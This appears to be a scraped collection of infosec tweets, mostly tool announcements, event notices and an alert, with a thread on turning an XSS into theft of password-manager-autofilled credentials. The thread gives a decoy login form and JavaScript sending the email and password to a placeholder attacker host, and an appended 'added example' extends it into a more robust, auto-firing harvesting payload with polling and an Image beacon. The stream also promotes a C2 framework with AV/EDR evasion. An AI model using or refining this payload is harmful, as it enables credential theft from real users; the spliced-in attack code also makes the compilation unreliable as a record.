New Tool Drop: #kubeRadar
A #Kubernetes recon & audit tool.
Get insights into:
• Nodes, Namespaces
• RBAC, NetPols
• Secrets, Pod configs & more
Supports #EKS, #AKS & local clusters.
https://t.co/2qeSg4Fwk8
#AppSec #InfoSec #Hacking
Someone just sent me an XSS to collaborate on. It was an interesting case so I thought I'd tweet about it.
They'd found an XSS in https://t.co/CkURxK6bwR, which was a subdomain that is only used to authenticate users.
They were having trouble escalating the XSS because this subdomain has no access to the main application at https://t.co/WfO0XAPrLD, or the API it interacts with, which is at https://t.co/GoBAfEGRfL.
I immediately thought of something that I'd heard recently (maybe on @ctbbpodcast?) where you can use an XSS to steal auto-filled plaintext credentials, so I thought I'd try to replicate this.
First, I injected a fake login form, like this:
<form><input id="email" type="text"><input id="password" type="password"></form>
This is good enough to have a password manager automatically fill the credentials if it is injected into any page on the correct domain.
Now we just needed to send the credentials to the attacker server, so I wrote some basic JS to do this:
// Wait for the password manager to autofill the injected form, then exfiltrate the values.
setTimeout(function () {
  var httpRequest = new XMLHttpRequest();
  // BURP_COLLABORATOR is a placeholder for the attacker-controlled host; the
  // values are URL-encoded so a password containing '&', '#' or '=' survives the query string.
  httpRequest.open('GET', 'https://BURP_COLLABORATOR/?' +
    encodeURIComponent(document.getElementById("email").value) + "=" +
    encodeURIComponent(document.getElementById("password").value));
  httpRequest.send();
}, 2000);
The timeout is required because it takes a while for the password manager to autofill the passwords.
Then I used the XSS to inject the form, and the JavaScript, and voila! Plaintext credentials.
This isn't a new technique; I can see there are a bunch of other articles about it, but it's the first time I've exploited an XSS to steal creds from a password manager like this, so I figured some others would find it interesting.
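As an added example, not the code from the thread above: a more robust version of the same autofill-harvesting payload. It fixes two weaknesses a practitioner would hit with the fixed two-second timer: it polls the injected fields until the manager has actually filled them (and gives up after a deadline), and it URL-encodes the credentials so a password containing `&`, `=` or `#` is not truncated on the collaborator side. It sends the beacon with an `Image` request rather than XHR, which needs no CORS permission. Assumptions: `BURP_COLLABORATOR` is a placeholder for the attacker-controlled host, the payload runs on the origin the victim's password manager has credentials saved for (as the thread explains, autofill only happens on the matching domain), and the `autocomplete="username"`/`"current-password"` hints are an addition that helps some managers recognise the decoy form; the `readValues` callback is injected purely so the polling logic can be exercised outside a browser.

```javascript
// Added example (not the original tweet's code). BURP_COLLABORATOR is a
// placeholder host; #email/#password are the decoy fields injected via the XSS.

// Build the exfiltration URL with both values URL-encoded, so '&', '=', '#'
// or '+' inside a password survive the query string intact.
function buildExfilUrl(collaboratorHost, email, password) {
  const params = new URLSearchParams({ u: email, p: password });
  return 'https://' + collaboratorHost + '/?' + params.toString();
}

// Poll the decoy form until both fields are filled, or fail after timeoutMs.
// A fixed 2-second setTimeout misses slow managers and wastes time on fast
// ones; polling reacts as soon as autofill has happened. readValues returns
// { email, password } and is injected so the logic is testable without a DOM.
function waitForAutofill(readValues, { intervalMs = 250, timeoutMs = 10000 } = {}) {
  return new Promise((resolve, reject) => {
    const deadline = Date.now() + timeoutMs;
    const tick = () => {
      const { email, password } = readValues();
      if (email && password) return resolve({ email, password });
      if (Date.now() >= deadline) return reject(new Error('autofill did not happen before deadline'));
      setTimeout(tick, intervalMs);
    };
    tick();
  });
}

// Browser entry point: inject the decoy form, wait for autofill, then send
// the credentials as an Image beacon (no CORS requirement, no preflight).
async function harvestAutofilledCredentials(doc, collaboratorHost) {
  const form = doc.createElement('form');
  // autocomplete hints are an assumption: they help some managers match the fields.
  form.innerHTML =
    '<input id="email" type="text" autocomplete="username">' +
    '<input id="password" type="password" autocomplete="current-password">';
  doc.body.appendChild(form);
  const creds = await waitForAutofill(() => ({
    email: doc.getElementById('email').value,
    password: doc.getElementById('password').value,
  }));
  new Image().src = buildExfilUrl(collaboratorHost, creds.email, creds.password);
  return creds;
}

// Only fire when running inside a page; under Node (no document) this is skipped.
if (typeof document !== 'undefined') {
  harvestAutofilledCredentials(document, 'BURP_COLLABORATOR').catch(() => {});
}
```

On the receiving side the collaborator log shows the credentials as `u=` and `p=` query parameters; if the promise rejects, the manager either had no matching saved login for that origin or requires a user gesture before filling, which is the first thing to check when this technique appears not to work.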
New release of crackmapexec is out ! 6.1.0🥳
This version now supports a new protocol: WMI, by @Memory_before! If the SMB port is filtered, you can still pwn3d everything!! 🔥
Quick list of improvements 🔽
- CME now works against Windows 2003 and Windows 7 (it was broken) 🖥️
- The RDP module has been improved a lot 🦖
- The WinRM protocol has been updated to support codecs 🛃
- The module enum_av can detect more AV 🛂
- Colors have been added to CME to highlight some misconfigurations (SMBv1, SMB signing) 🟩🟥
- Hashes can be exported in hashcat format from cmedb thanks to @al3x_n3ff !
- Audit mode can now reveal the first X chars thanks to @Kahvi0xff
- You can dump IIS AppPool credentials if configured to work with local or domain users @Shad0wCntr0ller
- A new module WCC from @__fpr to quickly check various Windows configurations and export them 📝
- List all DC IPs (useful to find old DCs on other subnets)
- Enumerate and identify trust relationships on the domain @Shad0wCntr0ller
And also many fixes! 🫡
▶️ Big kudos to @Memory_before for all contributions to this project !
▶️ Thanks to @al3x_n3ff for all the reviews over this release ! 🥰
▶️ Also big thanks to @M4yFly for GOAD lab access
It wouldn't have been such an amazing release without them 🫡
🪂
Full changelog 🔄
https://t.co/iOqS17v7s7
AM0N-Eye
AM0N-Eye is an advanced #RedTeam & Adversary Simulation Software for C2 operations, featuring OpSec tools and techniques for AV/EDR evasion, shellcode generation, persistence, BOF, and payload generation.
• Linux, macOS and Windows C2 serv… https://t.co/hR8WWeCkqF
Amazing story🥲:
A guy from our Discord found a poor cat in the garden. The cat had an animal RFID tag implant (FDX-B 134kHz), so he scanned it with Flipper, found the cat's owner via the local animal ID database, and they were reunited. Turned out that 🐈 was missing for 2 years!
🎉New Website published🎉
🎁To celebrate the launch of the new website, we are giving away three annual Burp Bounty Pro licenses!
👉To participate you have to retweet and like. The winners will be announced on September 30.
👉https://t.co/DXxo2SKrY7
After 18 months of battling through restrictions, openings, closures and everything between, we are really excited to announce our event will be going ahead this year on 10th/11th Sept. There will be more information coming soon, so stay tuned. Thank you for all your support.
From @BlackHatEvents USA 2016:
A Journey From #JNDI/LDAP Manipulation to Remote Code Execution Dream Land by @pwntester and @olekmirosh
https://t.co/LbI7BTodtE
Now the exploit vector presented in 2016 is the #log4jRCE.
Attached: slide #11 from the presentation below. :)
❗ ALERT ❗A vulnerability has been identified in certain versions of Zoho ManageEngine ServiceDesk Plus. Exploitation of this vulnerability could allow an unauthenticated cyber actor to perform remote code execution on an unpatched system. Advice at: https://t.co/3SyJhdyX0r
YAS CTF is BACK !!! Registrations are now OPEN.
REGISTRATION IS FREE and THE GRAND PRIZES WILL BE REVEALED SOON.
Go Grab Your Spots Now!!!! https://t.co/lvq5ckdf2O
Registration is open until 26th Nov 2021 10:00 PM IST. 1st prize A$2000 in cash!!
#cybersecurity #ctf